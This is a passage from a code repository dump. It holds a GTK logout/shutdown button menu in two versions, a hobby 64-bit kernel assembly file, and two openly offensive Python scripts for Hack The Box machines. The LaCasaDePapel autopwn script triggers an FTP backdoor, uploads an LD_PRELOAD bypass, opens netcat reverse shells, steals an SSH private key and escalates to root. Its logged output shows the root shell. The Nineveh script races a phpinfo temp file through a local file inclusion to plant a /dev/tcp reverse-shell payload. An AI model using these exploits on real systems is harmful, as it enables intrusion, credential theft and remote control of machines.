32 | # We define a dictionary with button label-command key-value
33 | # pairs. The reason we use an OrderedDict is that in python
34 | # the simple dict does not keep the order of the keys and we
35 | # do not want our buttons to appear in arbitrary order.
36 | # Keep in mind that you have to edit the commands according
37 | # to your system and your needs.
38 | self.actions = OrderedDict([
39 | ("Cancel", None),
40 | ("Lock", "slock &"),
41 | ("Restart WM", "sudo killall dwm &"),
42 | ("Sleep", "sudo pm-suspend &"),
43 | ("Hibernate", "sudo pm-hibernate &"),
44 | ("Sleep + Hibernate", "sudo pm-suspend-hybrid &"),
45 | ("Logout", "sudo killall X &"),
46 | ("Reboot", "sudo reboot &"),
47 | ("Shutdown", "sudo poweroff &")])
48 |
49 | self.buttons = {}
50 |
51 | # We make our window undecorated, centered on screen
52 | # and we keep it on top.
53 | self.set_border_width(0)
54 | self.set_decorated(False)
55 | self.set_position(gtk.WIN_POS_CENTER)
56 | self.set_keep_above(True)
57 |
58 | # We define one vertical box and three horizontal boxes.
59 | # The vertical box will contain and align vertical the 3
60 | # horizontal boxes while each horizontal box while keep and align
61 | # horizontally 3 of our buttons. Therefore, in the end, we will
62 | # have a nice 3x3 buttons square,
63 | self.vbox = gtk.VBox(True, 5)
64 | self.hboxes = [gtk.HBox(True, 5), gtk.HBox(True, 5), gtk.HBox(True, 5)]
65 |
66 | # We create our buttons, put some icons and labels on them,
67 | # ‘connect’ their click event with a callback handler and pack
68 | # them inside the empty horizontal boxes (3 buttons in each
69 | # horizontal box).
70 | c = 0
71 | boxIndex = 0
72 | for label in self.actions.keys():
73 | self.buttons[label] = gtk.Button(label)
74 | ico = gtk.Image()
75 | ico.set_from_file(get_resource_path("images/"+label+".png"))
76 | self.buttons[label].set_image(ico)
77 | self.buttons[label].set_image_position(gtk.POS_TOP)
78 | self.hboxes[boxIndex].pack_start(self.buttons[label])
79 | self.buttons[label].connect('clicked', self.callback, label)
80 | c += 1
81 | if not (c % 3):
82 | boxIndex += 1
83 |
84 | # We pack the horizontal boxes inside the vertical box and
85 | # the vertical box inside our window. Do not forget to show
86 | # all our widgets with self.show_all().
87 | for hbox in self.hboxes:
88 | self.vbox.pack_start(hbox)
89 | self.add(self.vbox)
90 | self.show_all()
91 |
92 | # If our window is deleted/destroyed call self.callback (to exit)
93 | self.connect("delete-event", self.callback)
94 | # If a key is pressed call self.key_press_event
95 | self.connect("key-press-event", self.key_press_event)
96 |
97 | # This is the our keyboard callback/event handler function.
98 | # If the user has pressed Escape, we quit.
99 | def key_press_event(self, widget=None, event=None):
100 | keyval = event.keyval
101 | keyval_name = gtk.gdk.keyval_name(keyval)
102 | # state = event.state
103 | # ctrl = (state & gtk.gdk.CONTROL_MASK)
104 | if keyval_name == "Escape":
105 | gtk.main_quit()
106 | return False
107 |
108 | # This is the our generic callback function
109 | def callback(self, widget=None, data=None):
110 | if (data is not None and
111 | data in self.actions and
112 | self.actions[data] is not None):
113 | os.system(self.actions[data])
114 | gtk.main_quit()
115 |
116 | if __name__ == "__main__":
117 | SystemDialog()
118 | gtk.main()
119 |
--------------------------------------------------------------------------------
/hacking/HTB/LaCasaDePapel/autopwn_lacasadepapel.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python2
2 | # Author: Alamot
3 | import os
4 | import time
5 | import fcntl
6 | import base64
7 | from pwn import *
8 |
9 |
10 | def get_ip_address(ifname):
11 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
12 | return socket.inet_ntoa(fcntl.ioctl(
13 | s.fileno(),
14 | 0x8915, # SIOCGIFADDR
15 | struct.pack('256s', ifname[:15].encode())
16 | )[20:24])
17 |
18 |
19 | LHOST = get_ip_address("tun0")
20 | LPORT1 = 60000
21 | LPORT2 = 60001
22 | RHOST = "10.10.10.131"
23 | RPORT = 6200
24 | FTP_PORT = 21
25 | BUF_SIZE = 500
26 | TIMEOUT = 60
27 | SSH_BIN_LOCAL_PATH = "/usr/bin/ssh"
28 | CHANKRO_HOOK64_FILE = "hook64.so"
29 | REMOTE_PATH = "/tmp/"
30 | REV_SHELL = "/usr/bin/nc " + LHOST + " " + str(LPORT1) + " -e /bin/sh"
31 | #This works too: REV_SHELL = "#!/bin/bash\nrm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc " + LHOST + " " + str(LPORT1) + " >/tmp/f"
32 |
33 |
34 | print("What shell do you want?")
35 | print("[1] dali@lacasadepapel")
36 | print("[2] professor@lacasadepapel")
37 | print("[3] root@lacasadepapel")
38 | print("[4] Exit")
39 | response = None
40 | while response not in ["1", "2", "3", "4"]:
41 | response = raw_input("Please enter a number 1-4: ").strip()
42 | if response == "4":
43 | sys.exit()
44 |
45 | try:
46 | log.info("Attempting to trigger backdoor ...")
47 | ftp_conn = remote(RHOST, FTP_PORT)
48 | # Attempt to login to trigger backdoor
49 | ftp_conn.sendline("USER letmein:)")
50 | ftp_conn.sendline("PASS please")
51 | log.info("Triggered backdoor")
52 | except Exception:
53 | log.error("Failed to trigger backdoor.")
54 |
55 | time.sleep(1)
56 |
57 | try:
58 | r = remote(RHOST, str(RPORT))
59 | except Exception:
60 | log.error("Failed to connect to " + str(RHOST) + ":" + str(RPORT))
61 |
62 | r.recvuntil("Justin Hileman")
63 | log.info("Uploading chankro.so ...")
64 | r.sendline("$myfile = fopen('" + REMOTE_PATH + "chankro.so', 'w');")
65 |
66 | with open(CHANKRO_HOOK64_FILE, "rb") as f:
67 | while True:
68 | data = f.read(BUF_SIZE)
69 | if not data:
70 | break
71 | b64data = base64.b64encode(data)
72 | r.sendline("fwrite($myfile, base64_decode('" + b64data + "'));")
73 |
74 | r.sendline("fclose($myfile);")
75 |
76 | log.info("Uploading shell payload ...")
77 | r.sendline("file_put_contents('" + REMOTE_PATH +
78 | "acpid.socket', base64_decode('" + base64.b64encode(REV_SHELL) + "'));")
79 |
80 | log.info("Bypassing PHP restrictions ...")
81 | r.sendline("putenv('CHANKRO=" + REMOTE_PATH + "acpid.socket');")
82 | r.sendline("putenv('LD_PRELOAD=" + REMOTE_PATH + "chankro.so');")
83 | r.sendline("mail('a','a','a','a');")
84 | dali_shell = listen(LPORT1, timeout=TIMEOUT).wait_for_connection()
85 |
86 | if response == "1":
87 | dali_shell.sendline("whoami")
88 | dali_shell.interactive()
89 | sys.exit()
90 |
91 | log.info("Getting berlin's private key ...")
92 | dali_shell.sendline("curl -s http://127.0.0.1:8000/file/Li4vLnNzaC9pZF9yc2E=")
93 | dali_shell.recvuntil("-----BEGIN OPENSSH PRIVATE KEY-----")
94 | id_rsa_data = dali_shell.recvuntil("-----END OPENSSH PRIVATE KEY-----")
95 | id_rsa_key = "-----BEGIN OPENSSH PRIVATE KEY-----" + id_rsa_data + "\n"
96 | with open("berlin_id_rsa", "wt") as f:
97 | f.write(id_rsa_key)
98 | os.chmod("berlin_id_rsa", 0o600)
99 |
100 | log.info("Login via SSH as professor ...")
101 | # We use an ssh process to connect because pwntools ssh tube uses the paramiko module (which is incompatible with our private key format).
102 | professor_shell = process([SSH_BIN_LOCAL_PATH, "-tt", "-i", "berlin_id_rsa", "professor@"+RHOST], stdin=PTY)
103 |
104 | time.sleep(1)
105 |
106 | if response == "2":
107 | professor_shell.sendline("whoami")
108 | professor_shell.interactive()
109 | sys.exit()
110 |
111 | log.info("Escalating to root via memcached.ini ...")
112 | professor_shell.sendline("mv -f /home/professor/memcached.ini /home/professor/memcached.ini.orig")
113 | professor_shell.sendline("printf '[program:memcached]\ncommand = sudo -u root /usr/bin/nc " + LHOST + " " + str(LPORT2) + " -e /bin/sh\n' > /home/professor/memcached.ini")
114 | root_shell = listen(LPORT2, timeout=TIMEOUT).wait_for_connection()
115 | root_shell.sendline("whoami")
116 | root_shell.interactive()
117 |
118 |
119 | '''
120 | $ ./autopwn_lacasadepapel.py
121 | What shell do you want?
122 | [1] dali@lacasadepapel
123 | [2] professor@lacasadepapel
124 | [3] root@lacasadepapel
125 | [4] Exit
126 | Please enter a number 1-4: 3
127 | [*] Attempting to trigger backdoor ...
128 | [+] Opening connection to 10.10.10.131 on port 21: Done
129 | [*] Triggered backdoor
130 | [+] Opening connection to 10.10.10.131 on port 6200: Done
131 | [*] Uploading chankro.so ...
132 | [*] Uploading shell payload ...
133 | [*] Bypassing PHP restrictions ...
134 | [+] Trying to bind to 0.0.0.0 on port 60000: Done
135 | [+] Waiting for connections on 0.0.0.0:60000: Got connection from 10.10.10.131 on port 38127
136 | [*] Getting berlin's private key ...
137 | [*] Login via SSH as professor ...
138 | [+] Starting local process '/usr/bin/ssh': pid 17044
139 | [*] Escalating to root via memcached.ini ...
140 | [+] Trying to bind to 0.0.0.0 on port 60001: Done
141 | [+] Waiting for connections on 0.0.0.0:60001: Got connection from 10.10.10.131 on port 41479
142 | [*] Switching to interactive mode
143 | root
144 | $
145 | '''
146 |
--------------------------------------------------------------------------------
/shutdown_manager/shutdown-manager-plain-gtk3:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | **************************************************************
5 | * Description: A Gtk GUI with buttons bound to commands. *
6 | * It can be used as a logoff/shutdown interface *
7 | * for windows managers that lack one. *
8 | * *
9 | * Licence : Public Domain. *
10 | * *
11 | * Author : Antonios Tsolis (2016) *
12 | **************************************************************
13 | '''
14 | import os
15 | import gi
16 | gi.require_version("Gtk", "3.0")
17 | from gi.repository import Gtk
18 | from collections import OrderedDict
19 |
20 |
21 | # We define a get_resource_path function to help us find
22 | # the path of our icons in the system:
23 | def get_resource_path(rel_path):
24 | dir_of_py_file = os.path.dirname(__file__)
25 | rel_path_to_resource = os.path.join(dir_of_py_file, rel_path)
26 | abs_path_to_resource = os.path.abspath(rel_path_to_resource)
27 | return abs_path_to_resource
28 |
29 |
30 | class SystemDialog (Gtk.Window):
31 | def __init__(self):
32 | super(SystemDialog, self).__init__()
33 |
34 | # We define a dictionary with button label-command key-value
35 | # pairs. The reason we use an OrderedDict is that in python
36 | # the simple dict does not keep the order of the keys and we
37 | # do not want our buttons to appear in arbitrary order.
38 | # Keep in mind that you have to edit the commands according
39 | # to your system and your needs.
40 | self.actions = OrderedDict([
41 | ("Cancel", None),
42 | ("Lock", "slock &"),
43 | ("Restart WM", "sudo killall dwm &"),
44 | ("Sleep", "sudo pm-suspend &"),
45 | ("Hibernate", "sudo pm-hibernate &"),
46 | ("Sleep + Hibernate", "sudo pm-suspend-hybrid &"),
47 | ("Logout", "sudo killall X &"),
48 | ("Reboot", "sudo reboot &"),
49 | ("Shutdown", "sudo poweroff &")])
50 |
51 | self.buttons = {}
52 |
53 | # We make our window undecorated, centered on screen
54 | # and we keep it on top.
55 | self.set_border_width(0)
56 | self.set_decorated(False)
57 | self.set_position(Gtk.WindowPosition.CENTER)
58 | self.set_keep_above(True)
59 |
60 | # We define one vertical box and three horizontal boxes.
61 | # The vertical box will contain and align vertical the 3
62 | # horizontal boxes while each horizontal box while keep and align
63 | # horizontally 3 of our buttons. Therefore, in the end, we will
64 | # have a nice 3x3 buttons square,
65 | self.vbox = Gtk.VBox(homogeneous=True, spacing=5)
66 | self.hboxes = [Gtk.HBox(homogeneous=True, spacing=5), Gtk.HBox(homogeneous=True, spacing=5), Gtk.HBox(homogeneous=True, spacing=5)]
67 |
68 | # We create our buttons, put some icons and labels on them,
69 | # ‘connect’ their click event with a callback handler and pack
70 | # them inside the empty horizontal boxes (3 buttons in each
71 | # horizontal box).
72 | c = 0
73 | boxIndex = 0
74 | for label in self.actions.keys():
75 | self.buttons[label] = Gtk.Button(label=label)
76 | ico = Gtk.Image()
77 | ico.set_from_file(get_resource_path("images/"+label+".png"))
78 | self.buttons[label].set_image(ico)
79 | self.buttons[label].set_image_position(Gtk.PositionType.TOP)
80 | self.hboxes[boxIndex].pack_start(self.buttons[label], True, True, 0)
81 | self.buttons[label].connect('clicked', self.callback, label)
82 | c += 1
83 | if not (c % 3):
84 | boxIndex += 1
85 |
86 | # We pack the horizontal boxes inside the vertical box and
87 | # the vertical box inside our window. Do not forget to show
88 | # all our widgets with self.show_all().
89 | for hbox in self.hboxes:
90 | self.vbox.pack_start(hbox, True, True, 0)
91 | self.add(self.vbox)
92 | self.show_all()
93 |
94 | # If our window is deleted/destroyed call self.callback (to exit)
95 | self.connect("delete-event", self.callback)
96 | # If a key is pressed call self.key_press_event
97 | self.connect("key-press-event", self.key_press_event)
98 |
99 | # This is the our keyboard callback/event handler function.
100 | # If the user has pressed Escape, we quit.
101 | def key_press_event(self, widget=None, event=None):
102 | keyval = event.keyval
103 | keyval_name = Gtk.gdk.keyval_name(keyval)
104 | # state = event.state
105 | # ctrl = (state & Gtk.gdk.CONTROL_MASK)
106 | if keyval_name == "Escape":
107 | Gtk.main_quit()
108 | return False
109 |
110 | # This is the our generic callback function
111 | def callback(self, widget=None, data=None):
112 | if (data is not None and
113 | data in self.actions and
114 | self.actions[data] is not None):
115 | os.system(self.actions[data])
116 | Gtk.main_quit()
117 |
118 |
119 | if __name__ == "__main__":
120 | SystemDialog()
121 | Gtk.main()
122 |
--------------------------------------------------------------------------------
/os/part5/kernel/kernel.asm:
--------------------------------------------------------------------------------
1 | ; Author: Alamot
2 |
3 | BITS 64 ; We have entered the long mode! :)
4 |
5 | ;---Constants-------------------------------------------------------------------
6 | DATA_SEG equ 0x0010
7 |
8 | ;---Initialized data------------------------------------------------------------
9 | hello_world_message dw 12
10 | db 'Hello World!'
11 | ticks_message dw 14
12 | db 'Timer ticks: '
13 | keycode_message dw 14
14 | db 'Keyboard key: '
15 | task1_header dw 6
16 | db "Task 1"
17 | task2_header dw 6
18 | db "Task 2"
19 | task3_header dw 6
20 | db "Task 3"
21 |
22 | ;---Include---------------------------------------------------------------------
23 | %include "kernel/video.asm"
24 | %include "kernel/idt.asm"
25 | %include "kernel/isr.asm"
26 | %include "kernel/pma.asm"
27 | %include "kernel/tasking.asm"
28 | %include "kernel/debug.asm"
29 |
30 | ;---Code------------------------------------------------------------------------
31 | Kernel:
32 | lidt [abs IDTR] ; Load our IDTR
33 |
34 | mov al, 0x80 ; OCW1: Unmask all interrupts at master PIC.
35 | out PIC1_DATA, al
36 | mov al, 0x80 ; OCW1: Unmask all interrupts at master PIC.
37 | out PIC2_DATA, al
38 |
39 | ; Set all segments registers to DATA_SEG.
40 | mov ax, DATA_SEG
41 | mov ds, ax
42 | mov es, ax
43 | mov fs, ax
44 | mov gs, ax
45 | mov ss, ax
46 |
47 | ; Clear the screen.
48 | mov rax, 0x0020002000200020 ; Set background color to black (0) and
49 | ; character to blank space (20).
50 | call Fill_screen
51 |
52 | ; Print "Hello World!" at the upper right corner.
53 | mov ah, (VGA_COLOR_BLACK << 4) | VGA_COLOR_LIGHT_GREEN
54 | mov r8, 69 ; x = 69
55 | mov r9, 1 ; y = 1
56 | mov rsi, hello_world_message
57 | call Print
58 |
59 | ; Print the E280 memory mapping entries.
60 | mov ah, (VGA_COLOR_BLUE << 4) | VGA_COLOR_WHITE
61 | mov r8, 1 ; x = 1
62 | mov r9, 1 ; y = 1
63 | call Print_E280_memory_map
64 |
65 | ; Initialize the Physical Memory Allocator (PMA).
66 | call PMA_init
67 |
68 | ; Print PMA info
69 | mov ah, (VGA_COLOR_BLACK << 4) | VGA_COLOR_WHITE
70 | mov r8, 1 ; x = 1
71 | mov r9, 11 ; y = 11
72 | call Print_PMA_info
73 |
74 | ; Initialize general stack allocation to the current rsp value.
75 | mov [abs stack_allocation], rsp
76 |
77 | ; Create three tasks.
78 | mov rsi, Task1
79 | call Create_task
80 | mov rsi, Task2
81 | call Create_task
82 | mov rsi, Task3
83 | call Create_task
84 |
85 | ; Set active the first task slot
86 | mov qword [abs active_task_slot], 0
87 |
88 | ; Task 1: We print system timer ticks, keyboard scan code and frame bitmap.
89 | Task1:
90 | ; Print task message
91 | mov ah, (VGA_COLOR_DARK_GREY << 4) | VGA_COLOR_WHITE
92 | mov r8, 49 ; x = 49
93 | mov r9, 2 ; y = 2
94 | mov rsi, task1_header
95 | Call Print
96 | ; Print timer ticks message.
97 | inc r9
98 | mov rsi, ticks_message
99 | Call Print
100 | ; Print keyboard key message.
101 | inc r9
102 | mov rsi, keycode_message
103 | Call Print
104 | .loop:
105 | mov ah, (VGA_COLOR_DARK_GREY << 4) | VGA_COLOR_WHITE
106 | mov r8, 63 ; x = 63
107 | mov r9, 3 ; y = 3
108 | ; Print system timer ticks.
109 | mov r10, [abs systimer_ticks]
110 | call Print_hex
111 | inc r9
112 | ; Print keyboard scan code.
113 | mov r10, [abs keyboard_scancode]
114 | call Print_hex
115 | ; Print the frame bitamp of Physical Memory Allocator (PMA).
116 | mov ah, (VGA_COLOR_BLACK << 4) | VGA_COLOR_WHITE
117 | mov r8, 4 ; x = 4
118 | mov r9, 15 ; y = 15
119 | mov rsi, [abs PMA_bitmap_address]
120 | call Print_PMA_frame_bitmap
121 | jmp Task1.loop
122 |
123 | ; Task 2: We set r10 to 0 and we increase it by one in a loop.
124 | Task2:
125 | ; Print Task 2 header
126 | mov ah, (VGA_COLOR_BROWN << 4) | VGA_COLOR_WHITE
127 | mov r8, 49 ; x = 40
128 | mov r9, 6 ; y = 6
129 | mov rsi, task2_header
130 | Call Print
131 | mov r8, 49 ; x = 49
132 | mov r9, 7 ; y = 7
133 | mov r10, 0
134 | .loop:
135 | ; Allocate a PMA frame
136 | push rax
137 | Call PMA_alloc_frame
138 | mov rdi, rax ; rdi = rax = address of allocated frame
139 | pop rax
140 | ; Increase and print number of ticks
141 | inc r10
142 | Call Print_hex
143 | ; Release the PMA frame
144 | call PMA_free_frame
145 | jmp Task2.loop
146 |
147 | ; Task 3: We set r10 to 0xFFFFFFFFFFFFFFFF and we decrease it by one in a loop.
148 | Task3:
149 | ; Print Task 3 header
150 | mov ah, (VGA_COLOR_MAGENTA << 4) | VGA_COLOR_WHITE
151 | mov r8, 49 ; x = 49
152 | mov r9, 9 ; y = 9
153 | mov rsi, task3_header
154 | Call Print
155 | mov r8, 49 ; x = 40
156 | mov r9, 10 ; y = 10
157 | mov r10, 0xFFFFFFFFFFFFFFFF
158 | .loop:
159 | ; Allocate a PMA frame
160 | push rax
161 | Call PMA_alloc_frame
162 | mov rdi, rax ; rdi = rax = address of allocated frame
163 | pop rax
164 | ; Decrease and print number of ticks
165 | dec r10
166 | Call Print_hex
167 | ; Release the PMA frame
168 | call PMA_free_frame
169 | jmp Task3.loop
170 |
--------------------------------------------------------------------------------
/hacking/HTB/Nineveh/lfiphpinfo.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import sys
3 | import threading
4 | import socket
5 |
6 | LHOST="10.10.15.203"
7 | LPORT=60001
8 |
9 | def setup(host, port):
10 | TAG="Security Test"
11 |
12 | PAYLOAD="""Security Test\r& /dev/tcp/"""+str(LHOST)+"""/"""+str(LPORT)+""" 0>&1'\");?>\r"""
13 |
14 | REQ1_DATA="""-----------------------------7dbff1ded0714\r
15 | Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
16 | Content-Type: text/plain\r
17 | \r
18 | %s
19 | -----------------------------7dbff1ded0714--\r""" % PAYLOAD
20 |
21 | padding="A" * 5000
22 |
23 | REQ1="""POST /info.php?a="""+padding+""" HTTP/1.1\r
24 | Cookie: PHPSESSID=075nh4e5sg91ctg9pkkpdlecs4; othercookie="""+padding+"""\r
25 | HTTP_ACCEPT: """ + padding + """\r
26 | HTTP_USER_AGENT: """+padding+"""\r
27 | HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
28 | HTTP_PRAGMA: """+padding+"""\r
29 | Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
30 | Content-Length: %s\r
31 | Host: %s\r
32 | \r
33 | %s""" %(len(REQ1_DATA),host,REQ1_DATA)
34 |
35 | LFIREQ="""GET /department/manage.php?notes=/ninevehNotes/..%s HTTP/1.1\r
36 | User-Agent: Mozilla/4.0\r
37 | Proxy-Connection: Keep-Alive\r
38 | Cookie: PHPSESSID=075nh4e5sg91ctg9pkkpdlecs4\r
39 | Host: %s\r
40 | \r
41 | \r
42 | """
43 | return (REQ1, TAG, LFIREQ)
44 |
45 |
46 | def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
47 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
48 | s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
49 | s.connect((host, port))
50 | s2.connect((host, port))
51 | s.send(phpinforeq)
52 | d = ""
53 | while len(d) < offset:
54 | d += s.recv(offset)
55 | try:
56 | i = d.index("[tmp_name] =>")
57 | fn = d[i+17:i+31]
58 | except ValueError:
59 | return None
60 |
61 | #print(fn)
62 |
63 | s2.send(lfireq % (fn, host))
64 | d = s2.recv(4096)
65 | s.close()
66 | s2.close()
67 |
68 | if d.find(tag) != -1:
69 | return fn
70 |
71 | counter=0
72 |
73 | class ThreadWorker(threading.Thread):
74 | def __init__(self, e, l, m, *args):
75 | threading.Thread.__init__(self)
76 | self.event = e
77 | self.lock = l
78 | self.maxattempts = m
79 | self.args = args
80 |
81 | def run(self):
82 | global counter
83 | while not self.event.is_set():
84 | with self.lock:
85 | if counter >= self.maxattempts:
86 | return
87 | counter+=1
88 | try:
89 | x = phpInfoLFI(*self.args)
90 | if self.event.is_set():
91 | break
92 | if x:
93 | print "\nGot it!"
94 | self.event.set()
95 |
96 | except socket.error:
97 | return
98 |
99 | def getOffset(host, port, phpinforeq):
100 | """Gets offset of tmp_name in the php output"""
101 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
102 | s.connect((host,port))
103 | s.send(phpinforeq)
104 |
105 | d = ""
106 | while True:
107 | i = s.recv(4096)
108 | d+=i
109 | if i == "":
110 | break
111 | # detect the final chunk
112 | if i.endswith("0\r\n\r\n"):
113 | break
114 | s.close()
115 | i = d.find("[tmp_name] =>")
116 | if i == -1:
117 | raise ValueError("No php tmp_name in phpinfo output")
118 |
119 | print "found %s at %i" % (d[i:i+10],i)
120 | # padded up a bit
121 | return i+256
122 |
123 | def main():
124 | print "LFI With PHPInfo()"
125 | print "-=" * 30
126 | if len(sys.argv) < 2:
127 | print "Usage: %s host [port] [threads]" % sys.argv[0]
128 | sys.exit(1)
129 | try:
130 | host = socket.gethostbyname(sys.argv[1])
131 | except socket.error, e:
132 | print "Error with hostname %s: %s" % (sys.argv[1], e)
133 | sys.exit(1)
134 | port=80
135 | try:
136 | port = int(sys.argv[2])
137 | except IndexError:
138 | pass
139 | except ValueError, e:
140 | print "Error with port %d: %s" % (sys.argv[2], e)
141 | sys.exit(1)
142 |
143 | poolsz=10
144 | try:
145 | poolsz = int(sys.argv[3])
146 | except IndexError:
147 | pass
148 | except ValueError, e:
149 | print "Error with poolsz %d: %s" % (sys.argv[3], e)
150 | sys.exit(1)
151 | print "Getting initial offset...",
152 | reqphp, tag, reqlfi = setup(host, port)
153 | #print(reqphp)
154 | offset = getOffset(host, port, reqphp)
155 | sys.stdout.flush()
156 | maxattempts = 1000
157 | e = threading.Event()
158 | l = threading.Lock()
159 | print "Spawning worker pool (%d)..." % poolsz
160 | sys.stdout.flush()
161 | tp = []
162 | for i in range(0,poolsz):
163 | tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))
164 | for t in tp:
165 | t.start()
166 | try:
167 | while not e.wait(1):
168 | if e.is_set():
169 | break
170 | with l:
171 | sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
172 | sys.stdout.flush()
173 | if counter >= maxattempts:
174 | break
175 | print
176 | if e.is_set():
177 | print "Woot! \m/"
178 | else:
179 | print ":("
180 | except KeyboardInterrupt:
181 | print "\nTelling threads to shutdown..."
182 | e.set()
183 |
184 | print "Shuttin' down..."
185 | for t in tp:
186 | t.join()
187 |
188 | if __name__=="__main__":
189 | main()
190 |
--------------------------------------------------------------------------------